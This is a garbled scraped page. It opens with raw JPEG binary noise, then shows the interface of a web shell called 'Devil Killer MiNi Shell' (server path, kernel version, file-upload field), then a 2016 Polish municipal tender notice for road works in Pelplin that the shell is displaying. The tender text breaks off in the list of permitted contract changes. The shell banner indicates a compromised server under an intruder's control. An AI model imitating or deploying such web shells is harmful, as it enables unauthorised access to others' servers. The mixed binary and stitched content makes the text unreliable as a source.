JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160623/101055-N-2016.html

<p class="kh_header"><b>Pelplin: Przebudowa ulicy Słowackiego w miejscowości Pelplin</b><br>
<b>Numer ogłoszenia: 101055 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pelplin , plac Grunwaldzki 4, 83-130 Pelplin, woj. pomorskie, tel. 58 536 12 61, faks 536 14 64.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Słowackiego w miejscowości Pelplin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
- wykonanie odcinka jezdni z chodnikiem dwustronnym od zjazdu z drogi wojewódzkiej   (obwodnicy )- całość w obrębie drogi gminnej wg projektu budowlanego Budowa odcinka ulicy Słowackiego w Pelplinie- trwa postępowanie w sprawie uzyskania pozwolenia na budowę
- wykonanie remontu drogi ul. Słowackiego i Sienkiewicza : wymiana chodników z płytek chodnikowych na chodniki z kostki betonowej, wykonanie dywanika asfaltowego na jezdni- zakres chodników w kierunku ulic wlotowych : przyjęto do miejsc charakterystycznych tj. koniec chodnika, pierwszy zjazd na działkę. Zakres asfaltowania w ulice podrzędne: ok.  5,0 m poza skrzyżowanie.
Do kalkulacji przyjęto wymianę krawężników oraz obrzeży, przy czym pominięto obrzeża  w miejscach, gdzie są fundamenty pod ogrodzenia. Szerokość chodników zmienna, z zachowaniem dotychczasowych szerokości. Dodatkowo przyjęto nowy chodnik od zjazdu z obwodnicy do posesji za laskiem. Zjazdy na posesje z zachowaniem istniejących zjazdów na podbudowie betonowej z kostki grafitowej. Tereny przyległe (zieleń) wyprofilować i obsiać trawą. Krawężnik od strony lasku nowy w postaci odwodnienia krawężnikowego dla odpływu wody na odcinku 150 mb ( co drugi krawężnik odwodnieniowy),przy czym na odcinku , gdzie teren przy lesie obniża się, pas zieleni o szerokości około 2,0 m należy wyprofilować ze spadkiem w kierunku lasu - realizacja zadania na zgłoszenie budowy
- przebudowa ulicy Pólko polegająca na wymianie nawierzchni z płyt drogowych na jezdnię o nawierzchni asfaltowej, wymiana jednostronnego chodnika z płytek na chodnik z kostki betonowej . Dodatkowo przyjęto do realizacji wymianę zjazdów na posesje na odcinku drogi, gdzie są nowe nawierzchnie z asfaltu ( nawierzchnie pozostają bez zmian , jedynie wskazane wyżej zjazdy-do wykonania).
Uwaga: zdemontowane płyty drogowe całe należy odwieźć na teren Pelkomu, ul. Starogardzka 12 ( odległość do 1,0 km) , natomiast zniszczone , połamane zdemontować i odwieźć na PSZOK do utylizacji ( odległość do 1,0 km).
Płytki chodnikowe całe zdemontować i ułożyć na paletach - zwrot do Inwestora na miejsce wskazane - transport do 1,0 km. Połamane - wywóz do PSZOK do utylizacji- transport do 1,0 km.
-budowa pasażu pieszego ( częściowo pieszo-jezdnego) z kostki betonowej
-budowa drogi dojazdowej z płyt typu Meba na podsypce piaskowej, z wypełnieniem płyt kruszywem łamanym
Szczegółowy zakres prac określa projekt budowlany  Budowa pasażu łączącego ul. Słowackiego z ul. Pólko w Pelplinie - trwa postępowanie w sprawie uzyskania pozwolenia na budowę
Uwaga: wszystkie drogi objęte zamówieniem są drogami gminnymi, w związku z tym Wykonawca będzie zwolniony z ponoszenia opłat za zajęcie pasa drogowego itp. Tym niemniej obowiązkiem Wykonawcy będzie oznakowanie terenu robót na czas budowy.

3.1 Zakres rzeczowy robót :
      
Lp.	Zakres działania	ilość	Jednostka 
Ulica Słowackiego i Sienkiewicza
1. 	Wymiana krawężników 	750,0	mb
2.	Wymiana obrzeży	377,0	mb
3.	Wymiana chodników z płytek na chodniki z kostki	565,5	m2
4.	Dywanik asfaltowy	3224,0	            m2
5.	Nowy chodnik z kostki betonowej 	 204,0	m2
Ulica Pólko
6.	Rozebranie nawierzchni z płyt  drogowych 	1170,0	m2
7.	Wymiana obrzeży 	195,0	mb
8.	Wymiana krawężników betonowych 	390,0	mb.
9.	Wykonanie nowej nawierzchni asfaltowej na podbudowie	1179,0	m2.
Remont nawierzchni od skrzyżowania z ul. Starogardzką
10.	Wymiana krawężników drogowych 	250,0	mb
11.	Wymiana obrzeży	100,0	mb
12.	Wymiana chodników z płytek na chodniki z kostki	442,30	m2
13.	Wykonanie dywanika asfaltowego bitumicznego	775,0 	m2.
Budowa odcinka ul. Słowackiego w Pelplinie
14.	Chodnik z kostki betonowej 	459,0	m2
15.	Krawężnik betonowy 	249,0	mb
16.	Obrzeże chodnikowe 	231,0	mb
17.	Nawierzchnia asfaltowa 	876,0	m2
18.	Drenaż francuski	129,0	m3
Budowa pasażu łączącego ul. Słowackiego z ul. Pólko w Pelplinie
19.	Wykonanie nawierzchni z kostki betonowej  8 cm	919,1	m2
20.	Wykonanie nawierzchni z kostki betonowej  6 cm	538.4	m2
21.	Nawierzchnia  ażurowa z płyt Meba	697,42	m2
 
Powyższy zakres obejmuje tylko niektóre elementy robót , w celu zobrazowania skali zadania. Szczegółowy zakres wykonania robót zawiera przedmiar, opis techniczny,   specyfikacje techniczne wykonania i odbioru robót oraz rysunki załączone do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.20-7, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 30.000 złotych
słownie : trzydzieści tysięcy złotych

1. Wadium w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: 
Bank : Bank Spółdzielczy o/Pelplin 
Nr rachunku : 62 8342 0009 2000 0358 2000 0004
z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej 
zadania:      
Przebudowa ulicy Słowackiego w miejscowości Pelplin.

2.	Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
3.	Wadium może być wnoszone w formie: poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed?siębiorczości, które należy w formie nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
4.	Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie 
    gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych 
    w art. 46 ust. 4a i 5 ustawy P.z.p. 
5.	Treść gwarancji wadialnej musi zawierać następujące elementy:
a)	nazwa i adres Zamawiającego;
b)	określenie przedmiotu zamówienia;
c)	nazwę i adres Wykonawcy.
6.	Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert. 
7.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
8.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
9.  Warunki zwrotu wadium, ponownego wniesienia  oraz jego zatrzymania określa art.46 
     Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie jest wymagane</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat licząc od dnia złożenia oferty a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. 2 robót polegających na przebudowie, budowie drogi o nawierzchni bitumicznej wraz z chodnikami z kostki betonowej za kwotę nie mniejszą niż 300 000 zł każda;
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia ( poprzez wypełnienie tego warunku należy rozumieć nie tylko dysponowanie dokumentami potwierdzającymi wiedzę i doświadczenia, ale przede wszystkim oddanie do dyspozycji Zamawiającego osoby odpowiedzialnej za kierowanie budową, która posiada wymagane uprawnienia oraz doświadczenie albo oddanie do dyspozycji Zamawiającego osoby odpowiedzialnej za kierowanie budową i wykonanie części lub całości zamówienia ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że dysponują lub będą dysponować narzędziami , wyposażeniem i urządzeniami technicznymi niezbędnymi do realizacji zadania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.: 
                 kierownika budowy z uprawnieniami do wykonywania samodzielnych funkcji w
                 budownictwie o specjalności drogowej
                 Kadra kierowania budową musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Wykonawcy wykażą, posiadają ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej na sumę ubezpieczenia min. 1 mln zł;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o:
         a) zobowiązaniu do uporządkowaniu terenu po zakończeniu robót
b) zobowiązaniu do sporządzenia dokumentacji powykonawczej ( jeżeli będzie taka potrzeba ),
c) wykonaniu powykonawczej inwentaryzacji geodezyjnej na części nowe 
   (wybudowane)
d) zaakceptowaniu warunków rozliczenia określonych w rozdziale IV ust. 5,
e) dysponowaniu narzędziami, wyposażeniem, urządzeniami technicznymi niezbędnymi 
   do realizacji zadania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja jakości i rękojmi za wady - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.
3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie ,jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)	Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
a)	śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)	nie wywiązywania się kluczowego specjalisty z obowiązków wynikających   z umowy.
3)	Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
4)	Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
5)	Wykonawca może zwrócić się o przedłużenie terminu wykonania przedmiotu umowy o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w wykonaniu następujących zobowiązań:
a)	przekazania terenu budowy,
b)	przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,  innych wymaganych przepisami, do których zamawiający był zobowiązany),
c)	przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczanej dokumentacji projektowej,
d)	zapewnienia  możliwości  poboru wody i energii elektrycznej na potrzeby budowy,
e)	zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
f)	zmiany terminu dokonania odbiorów przewidzianych w umowie.
6)	Wykonawca może zwrócić się o przedłużenie terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a)	zawieszenia robót przez Zamawiającego,
b)	wykopalisk uniemożliwiających wykonanie robót,
c)	szczególnie niesprzyjających warunków  atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów,
d)	siły wyższej, klęski żywiołowej
e)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub dających się przypisać Zamawiającemu lub innemu  wykonawcy zatrudnionemu  przez Zamawiającego na terenie budowy,
f)	niewypałów i niewybuchów,
g)	wykopalisk archeologicznych nieprzewidywanych w siwz,
h)	odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych (kategorie gruntu, kurzawka  itp.),
i)	odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności  istnienie  podziemnych urządzeń, instalacji lub obiektów  infrastrukturalnych,
j)	  zmiany się w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu  umowy, lub tych zmian dokona Zamawiający,
k)	jeżeli jednostki administracji nie zachowają wymaganych zgodnie z obowiązującymi przepisami terminów odpowiedzi na wnioski, a zwłaszcza jeżeli organ wydający decyzję o pozwoleniu na użytkowanie opóźni jej wydanie ponad termin zaplanowany w niniejszej umowie, a wykonawca wykaże, że nie stało się to z jego winy.            
7)	Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego , w szczególności :
a)	wstrzymanie robót przez  Zamawiającego,
b)	konieczności  usunięcia błędów lub wprowadzenia zmian w dokumentacji  projektowej.
8)	Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji,  zezwoleń  itp.,
b)	odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
9)	Jeżeli powstały konieczne zmiany  technologiczne, w szczególności :
a)	konieczności zrealizowania  projektu  przy  zastosowaniu innych  rozwiązań  technicznych/technologicznych  niż wskazane w dokumentacji  projektowej w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby niewykonaniem  lub wadliwym  wykonaniem  projektu,
b)	odmienne od przyjętych w dokumentacji  projektowej  warunki  geologiczne   (kategorie gruntu, kurzawa itp.) skutkujące  niemożliwością  zrealizowania przedmiotu umowy  przy dotychczasowych założeniach  technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych  urządzeń instalacji  lub  obiektów infrastrukturalnych,     
d)	konieczności zrealizowania projektu przy  zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego  prawa.
Zmiany wskazywane w lit d będą wprowadzone wyłącznie w zakresie  umożliwiającym  oddanie przedmiotu  umowy do użytkowania, a  Zamawiający  może ponieść ryzyko zwiększanym z tego powodu  kosztom. Każde ze wskazanych  w lit. a -d  zmian  może  być powiązane ze zmianą  wynagrodzenia na zasadach określonych  przez strony.
 10)  Dopuszcza się skrócenie terminu realizacji zadania z uwagi na znaczny postęp robót  
        pod warunkiem wcześniejszej dostępności środków finansowych na zadanie oraz 
         uzyskania na to zgody Instytucji  Zarządzającej PROW.
11). Pozostałe zmiany 
